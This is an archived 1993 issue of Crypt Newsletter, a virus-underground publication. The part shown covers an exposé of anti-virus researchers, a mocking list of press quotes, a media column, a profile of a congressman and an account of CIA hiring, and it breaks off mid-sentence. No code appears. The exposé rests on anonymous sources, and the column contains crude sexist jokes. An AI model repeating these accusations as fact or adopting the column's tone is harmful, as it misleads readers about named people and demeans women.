home *** CD-ROM | disk | FTP | other *** search
/ Phoenix Rising BBS / phoenixrising.zip / phoenixrising / vir-docs / crptlt17.arj / CRPTLT.R17 < prev    next >
Text File  |  1993-08-15  |  57KB  |  1,241 lines

  1.  
  2.  
  3.                  CRYPT NEWSLETTER 17
  4.  
  5.                   -=July-Aug 1993=-
  6.  
  7.                  Edited by Urnst Kouch
  8.              CRYPT INFOSYSTEMS BBS:  818-683-0854
  9.              INTERNET:  ukouch@delphi.com, or
  10.               70743.1711@compuserve.com
  11.              ------------------------------------
  12.  
  13.        IN THIS ISSUE:  MOLEHUNT - A wilderness of mirrors encountered
  14.        while probing the events behind AIS . . . QUOTABLE QUOTES: A
  15.        reporter's resource guide for hacker/computer virus news . . .
  16.        Raoul Badger reports from the our east coast bureau in Naples,
  17.        SC . . .  Aristotle's Stupid  ANSI-bomb Tricks . . . An interrupt
  18.        vector lister from KohnTarK . . . YB-X virus: twisting code
  19.        into a pretzel to foil heuristic analysis . . . much more.
  20.  
  21.        MOLEHUNT: THE COLD, SECRET WAR OF VIRUS HUNTERS
  22.  
  23.        [The following story continues with news surrounding the break-up
  24.        of hacker information files on the US Bureau of Public Debt's
  25.        Security Branch BBS.  Because of the controversial nature of the
  26.        files - system hacking software, tutorials and virus source code -
  27.        The Bureau of Public Debt BBS became the target of a campaign
  28.        of anonymous protest aimed at closing the system. Because of the
  29.        controversy and whispering, mostly fueled by security worker
  30.        Paul Ferguson, administrators at Public Debt demanded the files
  31.        be removed from the system.  Weeks later the events were
  32.        splashed hysterically onto the front pages of the national news
  33.        media which, unsurprisingly, got the story wrong.  Spurred by
  34.        this imbalance, the Crypt Newsletter, Computer underground Digest
  35.        and others in the on-line community have slowly brought out
  36.        the complexities of the issues, personalities and secret dealings
  37.        behind the official news.  This segment exposes some of the
  38.        unethical behavior practiced by the Computer Antivirus Research
  39.        Organization (CARO), a publicly sanctimonious self-selected
  40.        group of professionals and pan-professionals with the purported
  41.        aim of keeping the world safe from computer virus infection.]
  42.  
  43.  
  44.        As the smoke clears from the ruins of the Bureau of Public
  45.        Debt's Security Branch bulletin board system, the only
  46.        thing to be seen is that, given their druthers, many
  47.        anti-virus software developers and security experts are little
  48.        different than caricatures of the venal computer thugs
  49.        they'd like to persecute.
  50.  
  51.        Consider: according to sources at The Bureau of Public Debt,
  52.        months prior to the campaign against the Public Debt
  53.        system, Computer Antivirus Research Organization (CARO) member
  54.        Joe Wells had attempted to enlist the aid of department
  55.        security workers in targetting and harassing, with the final aim
  56.        of shutting down - by whatever means necessary - a list of
  57.        bulletin board systems suspected of storing computer viruses.
  58.        The list, compiled by CARO, appeared, according to Public Debt
  59.        sources, to name some organizations and systems with
  60.        no connection to the computer underground or BBS's which
  61.        trade in computer viruses. Security branch workers rebuffed
  62.        Wells proposal as stupid and liable to result in
  63.        legal retaliation.
  64.  
  65.        About the same time, CARO member Klaus Brunnstein
  66.        of The University of Hamburg's (Germany) Virus Research
  67.        Center threatened Public Debt's Security Branch with a
  68.        press campaign if virus source code and hacker tools were
  69.        not removed from its BBS.
  70.  
  71.        This nettled Security Branch workers, who knew that other
  72.        CARO associates were helping themselves to the files in
  73.        contention.
  74.  
  75.        What emerged was nothing less than a picture of CARO
  76.        anti-virus software developers slithering out of some damp
  77.        underground cave, wending their way between stalagmites like
  78.        sightless, poison-skinned amphibians bent on petty schemes
  79.        of overthrow aimed at rivals and selected, real or imagined,
  80.        virus programming public enemies.
  81.  
  82.        In March, right on schedule, CARO member Alan Solomon lobbied
  83.        publicly against the Public Debt BBS at an IEEE Computer
  84.        Security conference in NYC.  But in a grand stroke of
  85.        cosmic irony, a member of the hacker/virus-programming
  86.        group Phalcon/SKISM known as Timelord "trashed" an
  87.        embarrassing CARO order-of-business memo written during an
  88.        informal meeting at the same conference.  Subsequently, the
  89.        CARO memo was passed on to Black Axis virus exchange sysop John
  90.        Buchanan who eventually sent it around the globe on
  91.        the NUKE_THEWORLD FIDONet echo in July.
  92.  
  93.        The memo is unique in that it provides an inside look at the
  94.        schizophrenic nature of CARO.  Up for CARO membership,
  95.        it reads, is virus exchange sysop John Buchanan.  (He
  96.        was later turned down.)  It also admits a "leak"
  97.        in the CARO virus collection (onto virus exchange bulletin
  98.        board systems) necessitating some form of "tagging" of
  99.        files so that sources can be traced.  The memo also requests
  100.        members to PUBLICLY disavow the existence of any such
  101.        CARO virus collection.
  102.  
  103.        Most interesting is the recirculation of Joe Wells' "virus
  104.        exchange" hit list idea. According to CARO, "it's mostly a US
  105.        problem" which is to be addressed by setting up a "Murky Database"
  106.        of virus exchange systems and their operators with the
  107.        aim of galvanizing a police prosecution against those found criminal,
  108.        but not against those innocent.
  109.  
  110.        It is worth noting that CARO, a self-selected professional/pan-
  111.        professional organization with primarily FOREIGN leadership, isn't
  112.        above trying to instigate police investigations against US
  113.        citizens.
  114.  
  115.        This kind of secret campaigning by CARO-members travels from
  116.        west to east, too.  Recently, CARO member Glenn Jordan
  117.        solicited the aid of virus exchange sysop John Buchanan in
  118.        an attempt to discredit a European researcher applying for
  119.        membership in CARO.  Jordan wanted Buchanan, who has by turn
  120.        been nominated for membership in CARO, turned down, and targeted
  121.        for harassment by the organization for running a system which
  122.        sells and trades viruses, to supply CARO with evidence that the
  123.        researcher in question had purchased viruses from his bulletin
  124.        board system. Buchanan, also known as Aristotle, refused to
  125.        cooperate, showing more integrity than any of the mentioned
  126.        CARO members.
  127.  
  128.        In retrospect, it becomes far less surprising that the Bureau
  129.        of Public Debt's BBS manager, Kim Clancy, would wish to have as
  130.        little to do as possible with any of a group of embarrasingly
  131.        smelly fish.
  132.  
  133.        The remainder of the story has been extensively covered in
  134.        Computer underground Digest and previous issues of The
  135.        Crypt Newsletter.  Acting under the encouragement of CARO-
  136.        member Alan Solomon, security worker Paul Ferguson planted an
  137.        anonymous letter of complaint in RISKS Digest 14.58 and later
  138.        supported it with a piece under his own name.  Bureaucrats at The
  139.        Bureau of Public Debt, spooked by Ferguson's "anonymous"
  140.        letter and the possibility of congressional inquiry, removed
  141.        hacker tools and virus code from the system.
  142.  
  143.        Weeks later, the story broke in one-sided fashion at The Washington
  144.        Post, with Paul Ferguson again able to carry himself off as
  145.        a "whistle-blower" and independent, but concerned "expert."
  146.        The official reality created was one of Kim Clancy and The
  147.        Bureau of Public Debt smeared as "morally bankrupt," according
  148.        to one spin-off news piece by columnist Wayne Rash in
  149.        the specialty tabloid, Communications Week.
  150.  
  151.        This world of suspicion, charge and countercharge has been
  152.        nothing if not a wilderness of mirrors, blinding and stupefying
  153.        to those looking in from the cold, but clearly revealing the
  154.        underhanded, sub rosa tactics of many anti-virus researchers to
  155.        those with the patience to look deep into its reflecting surface.
  156.  
  157.        [Because of the sheer size of letters and related debate on
  158.        this issue received by The Crypt Newsletter, we could not publish
  159.        everything we might have liked.  For further material,
  160.        we point to recent issues of Computer underground Digest,
  161.        or the archives at Crypt InfoSystems BBS (818-683-0854)
  162.        which contain extensive collections of network electronic
  163.        mail dealing with the Public Debt BBS news story.]
  164.  
  165.        QUOTABLE QUOTES: A JOURNALIST'S RESOURCE SHEET USEFUL IN
  166.        ADDING PUNCH TO ANY STORY ON COMPUTER VIRUSES OR
  167.        HACKERS.
  168.  
  169.        "The sleep of reason brings forth monsters." --Goya
  170.  
  171.        While researching topics of concern to anti-virus software
  172.        industry workers and computer virus programmers, The Crypt
  173.        Newsletter has managed to collect a great amount of potentially
  174.        confusing text, a literary land-mine so to speak, just
  175.        waiting to blow the foot off anyone blundering around
  176.        unescorted in the field.  As a public service, I've put together
  177.        this list of "quotable quotes" and how and when to deploy
  178.        them in stories on computer viruses and hackers. If you're
  179.        a journalist or just some yahoo who needs to punch up a
  180.        rant with superficially convincing expert testimony,
  181.        feel free to use them, properly credited, of course.
  182.  
  183.        For the time when you need a good definition of the
  184.        term "hacker":
  185.  
  186.        "Hackers are people analogous to drug addicts. They need
  187.        their fix and cannot leave the machine alone.  Like addicts
  188.        they seek novelty and new experiences. Writing a virus
  189.        gives them this, but unlike addicts who get immediate relief
  190.        after a fix, they are not usually present when the virus
  191.        triggers and releases its payload."
  192.         --Jan Hruska, anti-virus software developer, in
  193.         "Reefer Madness", oops - I mean,
  194.         "Computer Viruses and Anti-Virus Warfare"
  195.  
  196.       For the time when you need a good definition of the term
  197.       "freak" [sic]:
  198.  
  199.       "[Freaks are] an irresponsible subgroup of hackers, in the
  200.       same way some drug addicts remain reasonably responsible
  201.       (and use sterile needles), others (psychopaths) become
  202.       irresponsible (and share needles).  Freaks have serious
  203.       social adjustment problems . . . unspecified grudges against
  204.       society.  They have no sense of responsibility or remorse
  205.       about what they do . . . The mentality of the freak virus
  206.       writer is not unlike that of a person who leaves a poisoned
  207.       jar of baby food on a supermarket shelf.  He delivers his
  208.       poison, leaves and is untraced, and in his absence the
  209.       victim falls."
  210.         --Jan Hruska, same as above
  211.  
  212.       For when you need just the right touch of righteously
  213.       indignant flatulence:
  214.  
  215.       " . . . it's been a while since the Treasury has openly
  216.       helped lawbreakers ply their illicit trade."
  217.            --columnist Wayne Rash, on the US Public Debt
  218.            BBS, in - and I am not making this up - "Rash's
  219.            Judgment", Communications Week, June 28, 1993
  220.  
  221.       And, equally good:
  222.  
  223.       "The fact that the Treasury Department clearly has
  224.       demonstrated the depths of its moral bankruptcy may
  225.       not surprise those of us in [fill in your locale here],
  226.       but it should cause concern in the country in general."
  227.            --columnist Wayne Rash
  228.  
  229.       This next one is for when you want to scare someone
  230.       with the evil genius of virus authors.
  231.  
  232.       "One such virus-mutation engine, called Dark Avenger
  233.       [sic], and available in the darker corners of the
  234.       electronic bulletin board universe, lets expert programmers
  235.       create polymorphic viruses.
  236.            --Peter Lewis, in his "Executive Computer"
  237.            column in The NY Times, July 5, 1993
  238.  
  239.       And this is for when you want to convince someone that
  240.       it doesn't take an evil genius to make viruses. [Hint:
  241.       Don't use it in the same story as the above, it will just
  242.       confuse readers.]
  243.  
  244.       " . . . with this [virus code], relative amateurs could create
  245.       new viruses, according to software writers."
  246.            --reporter Joel Garreau in The Washington Post,
  247.            June 20, 1993
  248.  
  249.       This one is good for that human element "features section"
  250.       writers are fond of. It has one anti-virus software developer
  251.       taking a publicity op to blind-side a more successful
  252.       competitor.
  253.  
  254.       "Just a couple of years ago, one anti-virus product
  255.       developer created [demand for his product] at will with
  256.       trumped-up and wildly exaggerated prognostications about
  257.       what a new virus was going to do and when it was going to do it.
  258.       Remember Michelangelo?"
  259.         --Pam Kane, president of Panda Systems, quoted
  260.         by Peter Lewis in his "Executive Computer"
  261.         NY TIMES column [see above]
  262.  
  263.       And here's one by a guy totally unconnected to virus/anti-virus
  264.       commercial interests, a truly "independent" expert, a writer
  265.       of fiction.
  266.  
  267.       "There are all sorts of expensive programs nowadays for
  268.       detecting and neutralizing viruses.  And a whole lot of
  269.       people thinking up ways to invent viruses that can't be
  270.       got rid of.  It's a whole industry.  Lovely.  I mean
  271.       _rotten_."
  272.            --Dick Francis, former jockey and wildly
  273.            successful mystery novel author, in
  274.            his recent work, "Driving Force" (Putnam).
  275.  
  276.        The last quote I leave you with is a real crusher.
  277.        Including it as a snappy editorial capper will crown you
  278.        king or result in vilification beyond belief, depending
  279.        on the political slant of your peer group.
  280.  
  281.        "And if [bringing back moral and ethical backbone] fails,
  282.        we can always re sort to our barbaric past -- 'If a child
  283.        shows himself incorrigible, he should be decently and
  284.        quietly beheaded at the age of twelve.' (Don
  285.        Marquis, American journalist)"
  286.         --National Computer Security Association News
  287.         editorial, May/June 1993
  288.  
  289.        RAOUL BADGER, MEDIA CRITIC, REPORTS FROM THE CRYPT NEWSLETTER'S
  290.        EAST COAST BUREAU IN NAPLES, SC:
  291.  
  292.  
  293.     So you've read Badger's reviews and come to the conclusion
  294.     that he is a lonely, bitter misanthrope without prospects
  295.     for a meaningful career or a decent Friday night date.
  296.  
  297.     Well, no comment.
  298.  
  299.     But in an effort to show that literacy in America is not a
  300.     total waste, I'm compelled to examine an article by Scott
  301.     Shepard, written for the Cox News Service.
  302.  
  303.     Mr. Shepard's article appeared in The State Newspaper
  304.     (of Columbia, SC) under the title:
  305.  
  306.     "ROAD WITHOUT SIGNS:
  307.  
  308.     "Vision of information highway lacks design, rules for drivers"
  309.  
  310.     Mr. Shepard has done his research being less than
  311.     impressed with the "Information Highway"!
  312.  
  313.     The best line in the piece is repeated five times:
  314.  
  315.         "12:00"  "12:00"  "12:00",
  316.  
  317.     a not-so-subtle way of reminding the reader of the millions of
  318.     Americans who lack the know-how or will to master the skill
  319.     of setting the time on their VCR. [Crypt Newsletter techno-hint:
  320.     Place a rectangle of black electrical tape over the digits.  That
  321.     will fix it nicely.]
  322.  
  323.     Other highlights of this little gem:
  324.  
  325.       "The VCR jokes told by the experts and policy-makers reflect
  326.        their unease about their 'Field of Dreams' gamble that, if
  327.        you build it, users will come.
  328.  
  329.       "The good news is everyone in Congress supports the information
  330.        superhighway . . . [t]he bad news is nobody in Congress
  331.        understands what the information superhighway is."
  332.  
  333.                    -the above is a quote from Rep. Ed Markey,
  334.                 chairman of the House Subcommittee on
  335.                 Telecommunications and Finance. And before
  336.                 you run off looking to shake his hand
  337.                 consider detractors rate Markey little
  338.                 more than a press hound, equally lacking
  339.                 of techno-savvy as his Congressional
  340.                 brethren.
  341.  
  342.  
  343.  
  344.     And, here's another:
  345.  
  346.        "... superlatives spawn skepticism, however, especially since
  347.        neither the design of the information superhighway nor the rules
  348.        of the road governing such basics as access, privacy and
  349.        copyrights have been advanced.
  350.  
  351.       "Another basic issue -- who will pay for it -- hasn't been
  352.        emphasized in the public debate.
  353.  
  354.       "....T.J. Rodgers, president of Cypress Semiconductor Corp.,
  355.        called the administration's proposal a handout and labeled
  356.        the information superhighway 'the most recent example of
  357.        industries lining up to feed at the public trough.'"
  358.  
  359.       "The potential for amazing advances in individual thought and
  360.        creativity is very real, but so is the potential for oppression
  361.        and mistrust, the likes of which we have never seen before..."
  362.  
  363.                    -Emmanuel Goldstein, publisher of 2600
  364.                 Magazine
  365.  
  366.     Simply amazing! A balanced, well researched article on the
  367.     information highway that doesn't regurgitate Mitch Kapor's
  368.     pablum.
  369.  
  370.     Maybe there is hope for journalism in America, after all!
  371.  
  372.     Ah, but the cynic thinks, maybe not.  The July 19, 1993 issue
  373.     of TIME has a full page story on "Heartbreak in Cyberspace."
  374.     My, my, my.  Seems that some Lothario used the WELL [the Whole
  375.     Earth 'Lectronic Link] to develop ongoing relationships with
  376.     a number of "babes" [sounds of local P.C. Bund members knocking
  377.     on my door], oops, sorry, make that "women."
  378.  
  379.     Oh yes, Don Pardo-Lothario had one exchanging passionate phone
  380.     sex for hours on end.  He won another's complete trust.  A third
  381.     split the cost of an airline ticket so they could share a hot
  382.     and steamy weekend.
  383.  
  384.     The rest of the story is stupidly obvious.  Casanova-Don
  385.     Pardo-Lothario dumps the cow after getting cream [sound of local
  386.     P.C. Bund members breaking down my door], agghhh, make that
  387.     "shows himself for the low-life scum he really is."  Heartbroken
  388.     b---, uh, woman commiserates with girlfriends and finds out she
  389.     ain't the first. Women band together to spread the word on the
  390.     fiend.
  391.  
  392.     This sparks "a network-wide debate on the spoken and unspoken rules
  393.     of electronic etiquette," with all the standard recriminations and
  394.     rationalizations.
  395.  
  396.     I can understand that TIME had space to burn, but don't the
  397.     people on the WELL have anything better to do?  Jeez, I can hear
  398.     this kind of crap at any Xerox machine in any fair sized office in
  399.     the country.  Are there really people willing to spend two bucks
  400.     an hour to hear it again?  [Don't answer that.  It's rhetorical.]
  401.  
  402.     And what about this stunning conclusion?
  403.  
  404.         "'I feel like an absolute fool,' says Lisa.  'People
  405.        look at a computer and fail to realize that behind those
  406.        words is a real person with feelings.'  Welcome back to
  407.        the real world."
  408.  
  409.        This is news?  If Paul Fussel read it, he'd be rolling in
  410.        a pool of his own sick. As long as there have been primates
  411.        with swinging dic-- . . .[sounds of local P.C. Bund members
  412.        strapping me into an electric chair] uh, there have been lying,
  413.        cheating bastards willing to use any means necessary to achieve
  414.        gratification.  If you're a woman and don't know this, collar
  415.        any guy and he'll admit it.  Hell, we're even proud of it. If no
  416.        men are handy, ask any woman. Most will agree.
  417.  
  418.        Since using a keyboard has not been shown to dramatically
  419.        lower testosterone levels, why is any of this surprising?
  420.  
  421.        Oh well, Mr. Badger is signing off.  There's 'babes' [sounds of
  422.        local P.C. Bund members trying to execute me]  at The WELL who
  423.        need, heh-heh, "consolation and sympathy."
  424.  
  425.        IN RELATED NEWS:  A THUMBNAIL SKETCH OF CONGRESSMAN ED MARKEY,
  426.        U.S. POLICYMAKER FOR COMPUTERS AND TECHNOLOGY ISSUES
  427.  
  428.        In an August 1 news piece, The L.A. Times proclaimed Democrat
  429.        Rep. Ed Markey, "The Man Who Is 'Plugged in' to How the Nation
  430.        Communicates." Citizen Markey is of interest to newsletter readers
  431.        because he sits in charge of the House Telecommunications and
  432.        Finance subcommittee and has recently imposed himself on the
  433.        issues of privacy and encryption, the 'information superhighway'
  434.        and the public availability of virus source code and hacker tools
  435.        on the US Bureau of Public Debt's Security Branch bulletin board
  436.        system.
  437.  
  438.        The 47-year old, Massachusetts Congressman became a player
  439.        in the Public Debt controversy only after reading about it
  440.        in The Washington Post.  He subsequently sent a letter of
  441.        protest to Secretary of The Treasury Lloyd Bentsen (Public
  442.        Debt is subsidiary to the Dept. of Treasury) which was republished
  443.        in Computer underground Digest 5.57. In addition, Markey
  444.        collaborated with the National Computer Security Association's
  445.        recent Computer Virus Awareness Day confab in the nation's
  446.        capitol and it seems certain he will be involved in a drive
  447.        for new legislation against computer viruses and their trade which
  448.        is expected to crest in the winter months of this year.
  449.  
  450.        However, according to The L.A. Times, the politician who would
  451.        contribute to future policy on telecommunications, computer viruses
  452.        and the "information superhighway" has an office with only a
  453.        minimal set of the "high tech" tools he claims are part of the
  454.        nation's future: a telephone, TV, videocassette
  455.        player and fax machine. Hmmmm, no personal computer?
  456.  
  457.        In addition, in July 1988 Washingtonian magazine published a poll
  458.        dubbing Markey the "No. 1 'Camera Hog' in Congress."
  459.  
  460.        Markey also acknowledged to The L.A. Times that he accepts
  461.        contributions from leaders in the industry he's in charge of
  462.        regulating. Political rivals call this improper and in 1990,
  463.        consumer activist Ralph Nader went on record in The Boston Globe
  464.        claiming, "[Markey is] getting on a first name basis with too many
  465.        people in the industries he oversees, having too many dinners
  466.        with them."
  467.  
  468.        Although lauded by Telecommunications and Finance subcommittee
  469.        underling Rep. (Dem.) W. J. Tauzin of Louisiana who stated for
  470.        The L.A. Times that, "Ed Markey has arrived" and courtier for
  471.        the entertainment industry, Motion Picture Association of America
  472.        president Jack Valenti, who said "[Markey is presiding] over a sea
  473.        change in the way we communicate," Times business reporter
  474.        Jube Shiver, Jr., did not document any Markey-inspired technology
  475.        legislation which has been of benefit, directly or indirectly, to
  476.        the average American.
  477.  
  478.        DELL COMPUTER SURVEY SHOWS AMERICANS PHOBIC AND BAFFLED BY
  479.        DIGITAL ALARM CLOCKS, UNREADY TO DRIVE ON 'INFORMATION
  480.        SUPERHIGHWAY'
  481.  
  482.        A Dell Computer survey of 1,000 adults and 500 teens across
  483.        the country found a sizeable percentage mentally ill-prepared
  484.        to assault the coming 'information superhighway.'
  485.  
  486.        Twenty-five percent of those surveyed said they would not
  487.        use a computer unless it meant their job. Another quarter had
  488.        never used a computer or even recorded a favorite TV show on
  489.        a VCR.
  490.  
  491.        More results from the Dell poll:
  492.  
  493.        --Thirty-two percent of all adults were so cowed by
  494.        computers they feared breaking the machines if allowed
  495.        to use them unguided. Of these, 22 percent admitted fear
  496.        at the prospect of setting digital alarm clocks.
  497.  
  498.        --Fifty-one percent of the adults also found computers
  499.        and related technology baffling; 58 percent found the
  500.        pace of technological advance confusing.
  501.  
  502.        Shhhhh.  Loose lips sink ships! The Crypt Newsletter advises
  503.        not sharing this data with any mainstream business and technology
  504.        writers. They could become morose - perhaps even suicidal - at
  505.        the mere thought of having to 'eighty-six' 50 percent of all new
  506.        story ideas for the remainder of 1993.
  507.  
  508.        CRYPT NEWSLETTER FEATURE: HIRING PRACTICES AT THE CIA - NO
  509.        BEDWETTERS ALLOWED
  510.  
  511.        [This story was originally published by Times-Mirror, Inc.
  512.        in 1992, but we felt it's just the kind of thing newsletter
  513.        readers would find fascinating.  Republished with
  514.        permission.]
  515.  
  516.        So you want to be a spy?  And you're sure the place to go
  517.        is the CIA!
  518.  
  519.        The CIA _is_ interested in hearing from you.  It interviews
  520.        thousands of Americans for jobs as spies, intelligence
  521.        analysts and technical specialists every year.  But because
  522.        of its classified mission, hiring methods are unusual and
  523.        Kafka-esque, taking at least a year to complete and bound in
  524.        smothering bureacratic process, comic ineptitude and secrecy.
  525.  
  526.        Although the number of people employed by the CIA is classified,
  527.        it regularly recruits on college campuses and through the
  528.        job listings in major metropolitan newspapers.  A recent
  529.        series of advertisements aimed at minorities in magazines
  530.        like Ebony drew spectacular media attention, but the typical
  531.        CIA ad is bland and unassuming, easily blending in with
  532.        countless other corporate calls for highly-trained, college-
  533.        educated Americans.
  534.  
  535.        A year ago, one such ad ran in The Philadelphia Inquirer.
  536.        Candidates were encouraged to send resumes for consideration
  537.        to a post office box drop in Pittsburgh, one of the agency's
  538.        regional personnel clearinghouses.  Candidates would be
  539.        required to undergo a rigorous physical examination and
  540.        polygraph test, the ad warned ominously.
  541.  
  542.        I forwarded my resume to the CIA mail drop, listing my
  543.        qualifications as a scientist and journalist with the
  544.        reasoning that these talents would be useful in analysis.
  545.  
  546.        Apparently, the CIA's personnel staff agreed.  They got
  547.        back to me in about a month and in so doing, began a
  548.        unique series of communications.
  549.  
  550.        Candidates, you see, are not contacted directly by the
  551.        CIA.  Instead they are delivered mail that requests them
  552.        to contact an agency worker by telephone within a certain
  553.        time frame.  The contacts are often anonymous.  For example,
  554.        prospects whose last names began with "S" were asked to
  555.        phone "Bobbi - Program Officer" at the CIA's Stafford
  556.        Building in Tyson's Corner Center, VA.
  557.  
  558.        The initial interview with the CIA usually involves a type
  559.        of cattle call.  About a year ago, 30 of us met in a room
  560.        at The Valley Forge Convention Center.  There we underwent
  561.        preliminary screening from a CIA team led by Pittsburgh-based
  562.        representative Virginia Kraus.   The team included workers
  563.        from the agency's directorates of intelligence, operations
  564.        and science and technology, including one agency employee
  565.        who looked over my resume, saw that I worked at a newspaper
  566.        and added that he had come to the agency as a newsman, too.
  567.  
  568.        It was the job of this spy and his colleagues to weed out
  569.        potential crazies and issue to the remainder the agency's
  570.        personnel Holy Grail, the 30-page Personal History
  571.        Statement (PHS).
  572.  
  573.        The PHS is an inventory that scrutinizes all aspects of the
  574.        job candidate's professional and private life.  It becomes
  575.        the basic curiculum vitae used during hiring and the template
  576.        for the CIA's security team during its investigation of
  577.        potential agents.
  578.  
  579.        "Don't leave anything blank," warned one of the spies balefully
  580.        at the convention center.  "I didn't think anyone would really
  581.        sit down and go over the whole thing when I started, but
  582.        believe me, they do."
  583.  
  584.        The PHS requires the spy-in-waiting to designate references
  585.        in a number of categories, including family members, professional
  586.        acquaintances and personal (not family) acquaintances who have
  587.        lived in close proximity to the candidate for a year or two.
  588.  
  589.        "This is so the agency can call up your neighbors and ask them
  590.        if there's loud music and blue smoke coming out of your front
  591.        door on the weekends," Kraus cracked.
  592.  
  593.        The candidate is asked to document any record of criminal
  594.        activity including theft, traffic violations, sexual deviance
  595.        and perversion, unlawful drug use or undue publicity surrounding
  596.        a divorce or civil suit.  There is a battery of medical inquiries
  597.        probing the candidate's injuries and hospital visits, mental
  598.        stability, prescription and non-prescription drug use, gastro-
  599.        intestinal health and nocturnal micturition frequency.
  600.  
  601.        The candidate is warned that the veracity of his statement
  602.        is liable to be tested by polygraph.  Accompanying submission
  603.        of this dossier to the CIA are any collegiate transcripts
  604.        and a long writing sample dealing with any topic of interest
  605.        to intelligence workers.  For example, writing about home
  606.        grown pilot plants designed for the production of biological
  607.        warfare agents in Third World countries is appropriate if
  608.        you're applying for a job as an analyst.
  609.  
  610.        All candidates were warned not to inform anyone except close
  611.        family members of their CIA screening.  Kraus encouraged the
  612.        use of a cover like "the government" or "Department of
  613.        Defense" when notifying those who needed to be designated as
  614.        references.
  615.  
  616.        A few months after submission of the personal statement and
  617.        transcripts, the candidate is likely to get a phone call
  618.        from CIA security who identifies himself only as a member
  619.        of "the Agency."
  620.  
  621.        His job is to verify and embellish some of the information
  622.        included in the PHS, specifically those sections dealing with
  623.        criminal activity and homosexuality.
  624.  
  625.        In my case, the agent was particularly interested in a reference
  626.        to recreational marijuana use in college.
  627.  
  628.        "How many cigarettes would you say you smoked?" he asked.
  629.        Satisfied with the answer, the agent continued by inquiring
  630.        about drinking.
  631.  
  632.        "The Agency's position in these matters is one of abstention
  633.        enforced by testing," he said.  That concluded the interrogation.
  634.  
  635.        "You have a nice day," said the spy before hanging up.
  636.  
  637.        Most of this preliminary screening is in response to much
  638.        publicized problems the CIA has had in the past with the
  639.        penetration by the criminal or mentally ill.  James Jesus
  640.        Angleton, the feared head of the CIA's counterintelligence
  641.        wing and one of the most powerful men in the agency during
  642.        the height of The Cold War, left his office in disgrace,
  643.        having acquired a reputation, documented by journalists
  644.        Thomas Mangold and Seymour Hersh, as a paranoid alcoholic
  645.        and pathological liar.
  646.  
  647.        If the prospective employee's personal statement and transcripts
  648.        survive the initial evaluation, he or she is given a series
  649.        of aptitude and psychological tests.
  650.  
  651.        Those in eastern Pennsylvania were again contacted and issued
  652.        a ticket/summons for the tests, which were administered one
  653.        summer Saturday morning in the physics building at the University
  654.        of Pennsylvania in Philadelphia.
  655.  
  656.        The testing at Penn, an all-day affair, included a series of
  657.        vocabulary, simple math, reading comprehension and abstract
  658.        thought multiple-choice quizzes, similar to a college aptitude
  659.        test.
  660.  
  661.        Also included was the California Psychological Inventory,
  662.        devised by Dr. Harrison Gough, psychologist.  Our copy,
  663.        which had a copyright date of 1956, asked for true/false
  664.        responses to a number of statements, including:
  665.  
  666.        1) I have gotten myself into trouble because of my involvement
  667.        in unseemly sexual activities.
  668.  
  669.        2) In high school I was often sent to the principal's office
  670.        for "cutting up."
  671.  
  672.        3) I sweat in even the coolest weather.
  673.  
  674.        4) I believe it is every citizen's duty, as part of the community,
  675.        to keep his sidewalk and lawn neat and clean.
  676.  
  677.        5) I must admit, I think people are fools who don't think the
  678.        American way is the best there is.
  679.  
  680.        6) I often think people are watching me.
  681.  
  682.        7) I like tall women.
  683.  
  684.        8) I must admit, I don't mind being the "cut-up" at the office
  685.        party.
  686.  
  687.        One can only wonder what the two women who took the psychological
  688.        inventory that Saturday answered to question No. 7.
  689.  
  690.        It seemed curious that the agency was using a test from 1956 --
  691.        when presumably very few women applied for jobs in intelligence
  692.        and when being a "cut-up" in high school was one of the worst
  693.        things you could be accused of - to screen young professionals
  694.        in 1991.
  695.  
  696.        Two other tests included a work environment survey and a current
  697.        world events test, both tailored for the CIA.
  698.  
  699.        For example, the work environment survey asked whether the
  700.        candidates would accept a job in a foreign culture or where
  701.        conditions of extreme physical hazard (presumably a war zone),
  702.        unpalatable food, no sanitation or debilitating disease
  703.        prevail.  It also focused on whether candidates would be
  704.        willing to work anonymously and without recognition for
  705.        long periods of time for people they find personally
  706.        repugnant.
  707.  
  708.        The hardest test was the current world events quiz.  It presumed
  709.        a comprehensive knowledge of world politics and personalities
  710.        that might only be gained from religious study of The Washington
  711.        Post or a background in international relations.
  712.  
  713.        After the testing, a couple more months passed.
  714.  
  715.        Candidates were then informed by mail whether they had been bound
  716.        over for interview at CIA headquarters in McLean, VA.
  717.  
  718.        During this 9-month long period, no one from the agency had
  719.        spoken to me for more than five minutes.
  720.  
  721.        Finally, another letter arrived.  It included an appointment
  722.        date with "Agency Officials" interested in discussing
  723.        possible employment.
  724.  
  725.        The interview was set for the week after Thanksgiving in the
  726.        Directorate of Intelligence's Office of East Asian Analysis.
  727.        "Ellie" was my contact.  A room was reserved for the night
  728.        before at The Days Inn in Vienna, VA.
  729.  
  730.        It was a 15-minute drive to the CIA the next morning.  The
  731.        unmarked compound is not far from Langley High School.
  732.        You can tell you are there by the barricades of concrete and
  733.        obstacle-wire surround the wooded campus.
  734.  
  735.        The entrance block-house guard was supposed to check my
  736.        photo driver's license, but he handed it back and waved
  737.        me through without taking a look.
  738.  
  739.        The Directorate of Intelligence is a moden looking edifice
  740.        of cement and green glass.  At the entrance were a score of
  741.        smokers bearing the same furtive, hounded look seen at
  742.        other corporations where smoking within the building has been
  743.        banned.
  744.  
  745.        Just inside was a marble hallway containing a likeness of
  746.        William Casey.
  747.  
  748.        Getting to the Office of East Asian Analysis entails a check-in
  749.        at reception, where I presented my papers.  After a few minutes,
  750.        "Ellie," a middle-aged woman showed up to escort me.
  751.  
  752.        I was issued a green piece of paper and a pass card used to get
  753.        through an electronic Pinkerton security turnstile. A security
  754.        man gave my briefcase the once-over.  Overhead was a sign
  755.        stating that passage beyone the portal conferred agreement
  756.        to a search of your person, your belongings and your car at
  757.        any time.
  758.  
  759.        The agency has been sensitive to accusations that it's possible
  760.        to walk out of the building with highly classified materials
  761.        ever since 1978, when William Kampiles walked off CIA grounds
  762.        with technical manuals for the super-secret National Reconnaissance
  763.        Office's KH-11 spy satellite.  Kampiles, a junior clerk, was
  764.        sentenced to 40 years in jail for selling the manual to the
  765.        Soviets.  During the same period, 16 other KH-11 manuals
  766.        disappeared and were never traced.
  767.  
  768.        While I was coming in, many were coming out.  No bags were
  769.        checked.  Later, when I left, no one asked about my
  770.        briefcase.
  771.  
  772.        Upstairs in the Office of East Asian Analysis, National
  773.        Geographic-like photos of China adorned the walls.
  774.        Documents marked "SECRET" littered the desks.
  775.  
  776.        Sadie Brown-Fields, a personnel administrator for the office
  777.        was holding court.
  778.  
  779.        In her office, I asked her if the recession had affected
